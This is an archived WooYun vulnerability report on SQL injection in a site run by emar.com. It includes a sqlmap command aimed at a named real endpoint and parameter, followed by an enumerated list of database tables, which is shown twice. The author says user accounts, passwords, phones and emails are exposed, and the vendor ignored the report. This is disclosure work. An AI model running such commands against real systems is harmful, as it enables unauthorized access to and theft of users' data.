漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0169868
漏洞标题:亿玛旗下某站存在注入
相关厂商:emar.com
漏洞作者: 头晕脑壳疼
提交时间:2016-01-14 15:07
修复时间:2016-01-19 18:20
公开时间:2016-01-19 18:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
能不能首现?标题短小而精辟(有多少信息只有厂家知道)
详细说明:
注入点 sqlmap -u "http://qd.emaradx.com/agentquery.do" --data "agentName=11111"
Database: adx_accurate
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| ad_zone_daily_stat | 2680937 |
| advertiser_consume_log_20150911 | 994440 |
| advertiser_consume_log_20151116 | 990472 |
| advertiser_consume_log | 986504 |
| advertiser_consume_log_20150402 | 986246 |
| advertiser_consume_log_20150325 | 986141 |
| advertiser_consume_log_20150304 | 986051 |
| advertiser_consume_log_20150303 | 986049 |
| advertiser_consume_log0305 | 986012 |
| advertiser_consume_log_0204bak | 985720 |
| advertiser_consume_log_20150104 | 985421 |
| advertiser_consume_log_201201bak | 985056 |
| advertiser_consume_log_copy | 984248 |
| advertiser_consume_log_0915bak | 984144 |
| advertiser_consume_log_0902bak | 983917 |
| advertiser_consume_log_0808bak | 983155 |
| advertiser_consume_log_0730bak | 982930 |
| advertiser_consume_log_0714bak | 982528 |
| advertiser_consume_log_0710bak | 982421 |
| advertiser_consume_log_0709bak | 982332 |
| advertiser_consume_log_0604bak | 980960 |
| advertiser_consume_log_0603bak | 980931 |
| advertiser_consume_log_0418bak | 980019 |
| advertiser_consume_log_0417bak | 979994 |
| advertiser_consume_log_0415bak | 979942 |
| advertiser_consume_log_0304bak | 978931 |
| advertiser_withholding_log_0915bak | 363810 |
| advertiser_withholding_log | 363679 |
| advertiser_withholding_log_0902bak | 363486 |
| advertiser_withholding_log_0709bak | 360804 |
| advertiser_withholding_log_0604bak | 358599 |
| advertiser_withholding_log_0603bak | 358566 |
| advertiser_withholding_log_0429bak | 357507 |
| advertiser_withholding_log_0418bak | 357227 |
| advertiser_withholding_log_0417bak | 357195 |
| advertiser_withholding_log_0415bak | 357108 |
| advertiser_withholding_log_0402bak | 356584 |
| advertiser_withholding_log_0304bak | 355634 |
| daily_stat_hadoop | 229440 |
| daily_stat_201311 | 131784 |
| ad_zone_access_message | 128955 |
| daily_stat_201312 | 120768 |
| ad_zone_effect_track_cps | 118446 |
| daily_stat_hadoop_0710bak | 107767 |
| daily_stat_hadoop_0711bak | 103253 |
| daily_stat_hadoop_070909bak | 102695 |
| daily_stat_hadoop_0708bak | 95842 |
| campaign_ssp_ad_count_info | 91582 |
| daily_stat_history | 83312 |
| daily_stat_201401_0228bak | 76877 |
| daily_stat_201401_0409bak | 76877 |
| daily_stat_201401 | 76805 |
| daily_stat_hadoop_0714bak | 74908 |
| daily_stat_hadoop_0328bak | 74757 |
| daily_stat_201310 | 71546 |
| daily_stat_hadoop_0401bak | 63848 |
| daily_stat_hadoop_07202057bak | 63715 |
| daily_stat_effect_hadoop_0401bak | 56377 |
| daily_stat_hadoop_0304bak | 55823 |
| credit_score_log | 53669 |
| daily_stat_hadoop_0731bak | 53203 |
| daily_stat_hadoop_0730bak | 51668 |
| daily_stat_effect_hadoop_0304bak | 48521 |
| reg_user | 43373 |
| user_account | 43372 |
| user_account_20150907bak | 43372 |
| user_account_20150911 | 43372 |
| user_account_20151116 | 43372 |
| user_account_1121bak | 43364 |
| user_account_1122bak | 43364 |
| user_account_0915bak | 43357 |
| user_account_0902bak | 43356 |
| user_account_0822bak | 43350 |
| user_account_0808bak | 43345 |
| user_account_0730bak | 43343 |
| user_account_0709bak | 43340 |
| user_account_0710bak | 43340 |
| user_account_0714bak | 43340 |
| user_account_0603bak | 43328 |
| user_account_0604bak | 43328 |
| reg_user_20140507 | 43306 |
| user_account_0415bak | 43300 |
| user_account_0417bak | 43300 |
| user_account_0418bak | 43300 |
| user_account_0402bak | 43296 |
| user_account_0304bak | 43290 |
| daily_stat_201406 | 41170 |
| daily_stat_201406_0630bak | 39701 |
| daily_stat_201403_0404bak | 34209 |
| daily_stat_201403_copy | 34209 |
| daily_stat_201403 | 34192 |
| daily_stat_hadoop_0225bak | 30453 |
| daily_stat_effect_hadoop_0225bak | 26934 |
| daily_stat_201407_0808bak | 22928 |
| daily_stat_201407 | 22901 |
| daily_stat_201408 | 22776 |
| daily_stat_201407_0730bak | 21790 |
| daily_stat_201405 | 19086 |
| ad_zone_effect_track_cps_yqf | 18426 |
| ad_order_product_info | 18399 |
| daily_stat_201404 | 17516 |
| daily_stat_hadoop_0221bak | 15168 |
| daily_stat_effect_hadoop_0709fix | 13650 |
| daily_stat_201402_0305bak | 12384 |
| daily_stat_effect_hadoop_0304fix | 12106 |
| daily_stat_201402_0228bak | 12095 |
| daily_stat_201402 | 12005 |
| daily_stat_201402_0325bak | 12002 |
| daily_stat_201402_0328bak | 12002 |
| daily_stat_201407_0714bak | 12002 |
| daily_stat_201402_0304bak | 11849 |
| daily_stat_effect_hadoop_0221bak | 10585 |
| daily_stat_201407_0710bak | 9899 |
| daily_stat_201411bak | 9454 |
| daily_stat_201411 | 9446 |
| adboard | 8908 |
| daily_stat_201407_0709bak | 8612 |
| daily_stat_effect_hadoop_0220bak | 8444 |
| daily_stat_hadoop_0220bak | 8249 |
| campaign_x_region | 8196 |
| campaign_x_adboard | 8148 |
| daily_stat_201412 | 8089 |
| adboard_x_ssp_status | 8042 |
| daily_stat_201412_20150104 | 7819 |
| daily_stat_effect_hadoop_0214bak | 7700 |
| adboard_x_adcode | 7630 |
| daily_stat_201407_0708bak | 7387 |
| daily_stat_hadoop_0214bak | 7223 |
| daily_stat_effect_hadoop_0219bak | 7184 |
| daily_stat_hadoop_0219bak | 7002 |
| daily_stat_effect_hadoop_0228fix | 6904 |
| daily_stat_effect_hadoop_0226fix | 6877 |
| daily_stat_201501 | 6716 |
| daily_stat_201501_0204bak | 6715 |
| advertiser_investment_log | 6084 |
| ad_order_info | 6049 |
| advertiser_investment_log_0504 | 5944 |
| advertiser_investment_log_0304bak | 5926 |
| daily_stat_201409_1009bak | 5827 |
| daily_stat_201409 | 5568 |
| campaign_x_schedule | 5408 |
| daily_stat_201410 | 4932 |
| advertiser_plan_consume_log | 4854 |
| campaign_x_ssp_status | 4555 |
| daily_stat_effect_hadoop_0709re | 4552 |
| plan_consume_temp | 4465 |
| campaign_x_filter_url | 4429 |
| egao_pay | 4030 |
| daily_stat_201409_bak1 | 3707 |
| daily_stat_201503_0402 | 3624 |
| daily_stat_201503 | 3588 |
| area | 3305 |
| region | 3235 |
| campaign_x_topic | 3070 |
| daily_stat_201504 | 2815 |
| user_account_history | 2338 |
| plan_x_campaign | 2169 |
| agent_investment_log | 2163 |
| daily_stat_201409_0915bak | 2157 |
| campaign | 2132 |
| ad_zone | 2099 |
| daily_stat_201502_0304bak | 2048 |
| daily_stat_201502_bak | 2048 |
| ad_company | 2013 |
| daily_stat_201502 | 2001 |
| daily_stat_201502_0305 | 2000 |
| um_role_func_rule | 1890 |
| campaign_x_adzone | 1792 |
| campaign_1009bak | 1752 |
| ad_company_20140507 | 1738 |
| campaign_0915bak | 1641 |
| daily_stat_effect_hadoop | 1605 |
| agent_transfer_log | 1359 |
| campaign_x_prefer | 1268 |
| ad_cost | 1070 |
| daily_stat_201410_copy | 996 |
| campaign_ssp_ad_info | 886 |
| campaign_x_interest | 829 |
| daily_stat_201505 | 754 |
| adboard_x_adcode_0227bak | 678 |
| ad_zone_daily_stat_0324 | 663 |
| campaign_x_profession | 545 |
| adx_click | 462 |
| agent_application | 394 |
| yigaodepatment | 393 |
| campaign_x_age_section | 338 |
| daily_stat_effect_hadoop_0225fix | 331 |
| plan | 326 |
| sync_log | 304 |
| campaign_x_pdt_category | 275 |
| um_user | 249 |
| user_detail | 248 |
| um_func | 213 |
| um_func_0423bak | 203 |
| ad_zone_bak3 | 199 |
| ad_zone_bak4 | 199 |
| daily_stat_201503_0305 | 191 |
| um_role_user | 181 |
| rroc_errorlog | 176 |
| ad_zone_bak | 160 |
| ad_zone_bak1 | 160 |
| ad_zone_history_data | 133 |
| plat_product_category | 119 |
| campaign_x_sex | 115 |
| campaign_history_data | 91 |
| agent_account | 65 |
| agent_user | 65 |
| agent_user_20140507 | 61 |
| `size` | 58 |
| accurate_code | 57 |
| advertiser_plan_consume_log_20141015 | 57 |
| adboard_group | 56 |
| campaign_x_priority | 51 |
| campaign_x_rt | 51 |
| campaign_x_adboard_group | 48 |
| carousel_form | 44 |
| unit | 34 |
| daily_stat_201410bak1 | 31 |
| um_role | 31 |
| topic | 29 |
| reguser_yqfcampaign | 27 |
| media_categroy | 26 |
| campaign_category | 25 |
| department | 25 |
| unit_20140507 | 23 |
| dept_unit | 22 |
| mas_code | 22 |
| consume_preference | 20 |
| mediatype | 18 |
| mediatype_20140507 | 18 |
| interest | 15 |
| company | 14 |
| ecom | 11 |
| ecom_20140507 | 11 |
| cost_log | 8 |
| eight | 8 |
| profession | 8 |
| advertiser_consume_log_201506 | 7 |
| advertiser_consume_log_201508 | 7 |
| adx_eamil_data_templet | 7 |
| adx_eamil_send_user | 7 |
| user_x_adwiser | 7 |
| advertiser_consume_log_201507 | 6 |
| paytype | 5 |
| paytype_20140507 | 5 |
| plan_warn_setting | 5 |
| adboard_audit_detail | 4 |
| user_account_bak | 4 |
| campaign_x_rturl | 3 |
| test | 2 |
| alg_parameter | 1 |
| plan_strategy | 1 |
| um_rule | 1 |
| user_account_0228bak | 1 |
+--------------------------------------+---------+
泄露的用户账号密码电话邮箱等等
漏洞证明:
注入点 sqlmap -u "http://qd.emaradx.com/agentquery.do" --data "agentName=11111"
Database: adx_accurate
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| ad_zone_daily_stat | 2680937 |
| advertiser_consume_log_20150911 | 994440 |
| advertiser_consume_log_20151116 | 990472 |
| advertiser_consume_log | 986504 |
| advertiser_consume_log_20150402 | 986246 |
| advertiser_consume_log_20150325 | 986141 |
| advertiser_consume_log_20150304 | 986051 |
| advertiser_consume_log_20150303 | 986049 |
| advertiser_consume_log0305 | 986012 |
| advertiser_consume_log_0204bak | 985720 |
| advertiser_consume_log_20150104 | 985421 |
| advertiser_consume_log_201201bak | 985056 |
| advertiser_consume_log_copy | 984248 |
| advertiser_consume_log_0915bak | 984144 |
| advertiser_consume_log_0902bak | 983917 |
| advertiser_consume_log_0808bak | 983155 |
| advertiser_consume_log_0730bak | 982930 |
| advertiser_consume_log_0714bak | 982528 |
| advertiser_consume_log_0710bak | 982421 |
| advertiser_consume_log_0709bak | 982332 |
| advertiser_consume_log_0604bak | 980960 |
| advertiser_consume_log_0603bak | 980931 |
| advertiser_consume_log_0418bak | 980019 |
| advertiser_consume_log_0417bak | 979994 |
| advertiser_consume_log_0415bak | 979942 |
| advertiser_consume_log_0304bak | 978931 |
| advertiser_withholding_log_0915bak | 363810 |
| advertiser_withholding_log | 363679 |
| advertiser_withholding_log_0902bak | 363486 |
| advertiser_withholding_log_0709bak | 360804 |
| advertiser_withholding_log_0604bak | 358599 |
| advertiser_withholding_log_0603bak | 358566 |
| advertiser_withholding_log_0429bak | 357507 |
| advertiser_withholding_log_0418bak | 357227 |
| advertiser_withholding_log_0417bak | 357195 |
| advertiser_withholding_log_0415bak | 357108 |
| advertiser_withholding_log_0402bak | 356584 |
| advertiser_withholding_log_0304bak | 355634 |
| daily_stat_hadoop | 229440 |
| daily_stat_201311 | 131784 |
| ad_zone_access_message | 128955 |
| daily_stat_201312 | 120768 |
| ad_zone_effect_track_cps | 118446 |
| daily_stat_hadoop_0710bak | 107767 |
| daily_stat_hadoop_0711bak | 103253 |
| daily_stat_hadoop_070909bak | 102695 |
| daily_stat_hadoop_0708bak | 95842 |
| campaign_ssp_ad_count_info | 91582 |
| daily_stat_history | 83312 |
| daily_stat_201401_0228bak | 76877 |
| daily_stat_201401_0409bak | 76877 |
| daily_stat_201401 | 76805 |
| daily_stat_hadoop_0714bak | 74908 |
| daily_stat_hadoop_0328bak | 74757 |
| daily_stat_201310 | 71546 |
| daily_stat_hadoop_0401bak | 63848 |
| daily_stat_hadoop_07202057bak | 63715 |
| daily_stat_effect_hadoop_0401bak | 56377 |
| daily_stat_hadoop_0304bak | 55823 |
| credit_score_log | 53669 |
| daily_stat_hadoop_0731bak | 53203 |
| daily_stat_hadoop_0730bak | 51668 |
| daily_stat_effect_hadoop_0304bak | 48521 |
| reg_user | 43373 |
| user_account | 43372 |
| user_account_20150907bak | 43372 |
| user_account_20150911 | 43372 |
| user_account_20151116 | 43372 |
| user_account_1121bak | 43364 |
| user_account_1122bak | 43364 |
| user_account_0915bak | 43357 |
| user_account_0902bak | 43356 |
| user_account_0822bak | 43350 |
| user_account_0808bak | 43345 |
| user_account_0730bak | 43343 |
| user_account_0709bak | 43340 |
| user_account_0710bak | 43340 |
| user_account_0714bak | 43340 |
| user_account_0603bak | 43328 |
| user_account_0604bak | 43328 |
| reg_user_20140507 | 43306 |
| user_account_0415bak | 43300 |
| user_account_0417bak | 43300 |
| user_account_0418bak | 43300 |
| user_account_0402bak | 43296 |
| user_account_0304bak | 43290 |
| daily_stat_201406 | 41170 |
| daily_stat_201406_0630bak | 39701 |
| daily_stat_201403_0404bak | 34209 |
| daily_stat_201403_copy | 34209 |
| daily_stat_201403 | 34192 |
| daily_stat_hadoop_0225bak | 30453 |
| daily_stat_effect_hadoop_0225bak | 26934 |
| daily_stat_201407_0808bak | 22928 |
| daily_stat_201407 | 22901 |
| daily_stat_201408 | 22776 |
| daily_stat_201407_0730bak | 21790 |
| daily_stat_201405 | 19086 |
| ad_zone_effect_track_cps_yqf | 18426 |
| ad_order_product_info | 18399 |
| daily_stat_201404 | 17516 |
| daily_stat_hadoop_0221bak | 15168 |
| daily_stat_effect_hadoop_0709fix | 13650 |
| daily_stat_201402_0305bak | 12384 |
| daily_stat_effect_hadoop_0304fix | 12106 |
| daily_stat_201402_0228bak | 12095 |
| daily_stat_201402 | 12005 |
| daily_stat_201402_0325bak | 12002 |
| daily_stat_201402_0328bak | 12002 |
| daily_stat_201407_0714bak | 12002 |
| daily_stat_201402_0304bak | 11849 |
| daily_stat_effect_hadoop_0221bak | 10585 |
| daily_stat_201407_0710bak | 9899 |
| daily_stat_201411bak | 9454 |
| daily_stat_201411 | 9446 |
| adboard | 8908 |
| daily_stat_201407_0709bak | 8612 |
| daily_stat_effect_hadoop_0220bak | 8444 |
| daily_stat_hadoop_0220bak | 8249 |
| campaign_x_region | 8196 |
| campaign_x_adboard | 8148 |
| daily_stat_201412 | 8089 |
| adboard_x_ssp_status | 8042 |
| daily_stat_201412_20150104 | 7819 |
| daily_stat_effect_hadoop_0214bak | 7700 |
| adboard_x_adcode | 7630 |
| daily_stat_201407_0708bak | 7387 |
| daily_stat_hadoop_0214bak | 7223 |
| daily_stat_effect_hadoop_0219bak | 7184 |
| daily_stat_hadoop_0219bak | 7002 |
| daily_stat_effect_hadoop_0228fix | 6904 |
| daily_stat_effect_hadoop_0226fix | 6877 |
| daily_stat_201501 | 6716 |
| daily_stat_201501_0204bak | 6715 |
| advertiser_investment_log | 6084 |
| ad_order_info | 6049 |
| advertiser_investment_log_0504 | 5944 |
| advertiser_investment_log_0304bak | 5926 |
| daily_stat_201409_1009bak | 5827 |
| daily_stat_201409 | 5568 |
| campaign_x_schedule | 5408 |
| daily_stat_201410 | 4932 |
| advertiser_plan_consume_log | 4854 |
| campaign_x_ssp_status | 4555 |
| daily_stat_effect_hadoop_0709re | 4552 |
| plan_consume_temp | 4465 |
| campaign_x_filter_url | 4429 |
| egao_pay | 4030 |
| daily_stat_201409_bak1 | 3707 |
| daily_stat_201503_0402 | 3624 |
| daily_stat_201503 | 3588 |
| area | 3305 |
| region | 3235 |
| campaign_x_topic | 3070 |
| daily_stat_201504 | 2815 |
| user_account_history | 2338 |
| plan_x_campaign | 2169 |
| agent_investment_log | 2163 |
| daily_stat_201409_0915bak | 2157 |
| campaign | 2132 |
| ad_zone | 2099 |
| daily_stat_201502_0304bak | 2048 |
| daily_stat_201502_bak | 2048 |
| ad_company | 2013 |
| daily_stat_201502 | 2001 |
| daily_stat_201502_0305 | 2000 |
| um_role_func_rule | 1890 |
| campaign_x_adzone | 1792 |
| campaign_1009bak | 1752 |
| ad_company_20140507 | 1738 |
| campaign_0915bak | 1641 |
| daily_stat_effect_hadoop | 1605 |
| agent_transfer_log | 1359 |
| campaign_x_prefer | 1268 |
| ad_cost | 1070 |
| daily_stat_201410_copy | 996 |
| campaign_ssp_ad_info | 886 |
| campaign_x_interest | 829 |
| daily_stat_201505 | 754 |
| adboard_x_adcode_0227bak | 678 |
| ad_zone_daily_stat_0324 | 663 |
| campaign_x_profession | 545 |
| adx_click | 462 |
| agent_application | 394 |
| yigaodepatment | 393 |
| campaign_x_age_section | 338 |
| daily_stat_effect_hadoop_0225fix | 331 |
| plan | 326 |
| sync_log | 304 |
| campaign_x_pdt_category | 275 |
| um_user | 249 |
| user_detail | 248 |
| um_func | 213 |
| um_func_0423bak | 203 |
| ad_zone_bak3 | 199 |
| ad_zone_bak4 | 199 |
| daily_stat_201503_0305 | 191 |
| um_role_user | 181 |
| rroc_errorlog | 176 |
| ad_zone_bak | 160 |
| ad_zone_bak1 | 160 |
| ad_zone_history_data | 133 |
| plat_product_category | 119 |
| campaign_x_sex | 115 |
| campaign_history_data | 91 |
| agent_account | 65 |
| agent_user | 65 |
| agent_user_20140507 | 61 |
| `size` | 58 |
| accurate_code | 57 |
| advertiser_plan_consume_log_20141015 | 57 |
| adboard_group | 56 |
| campaign_x_priority | 51 |
| campaign_x_rt | 51 |
| campaign_x_adboard_group | 48 |
| carousel_form | 44 |
| unit | 34 |
| daily_stat_201410bak1 | 31 |
| um_role | 31 |
| topic | 29 |
| reguser_yqfcampaign | 27 |
| media_categroy | 26 |
| campaign_category | 25 |
| department | 25 |
| unit_20140507 | 23 |
| dept_unit | 22 |
| mas_code | 22 |
| consume_preference | 20 |
| mediatype | 18 |
| mediatype_20140507 | 18 |
| interest | 15 |
| company | 14 |
| ecom | 11 |
| ecom_20140507 | 11 |
| cost_log | 8 |
| eight | 8 |
| profession | 8 |
| advertiser_consume_log_201506 | 7 |
| advertiser_consume_log_201508 | 7 |
| adx_eamil_data_templet | 7 |
| adx_eamil_send_user | 7 |
| user_x_adwiser | 7 |
| advertiser_consume_log_201507 | 6 |
| paytype | 5 |
| paytype_20140507 | 5 |
| plan_warn_setting | 5 |
| adboard_audit_detail | 4 |
| user_account_bak | 4 |
| campaign_x_rturl | 3 |
| test | 2 |
| alg_parameter | 1 |
| plan_strategy | 1 |
| um_rule | 1 |
| user_account_0228bak | 1 |
+--------------------------------------+---------+
泄露的用户账号密码电话邮箱等等
修复方案:
版权声明:转载请注明来源 头晕脑壳疼@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-01-19 18:20
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无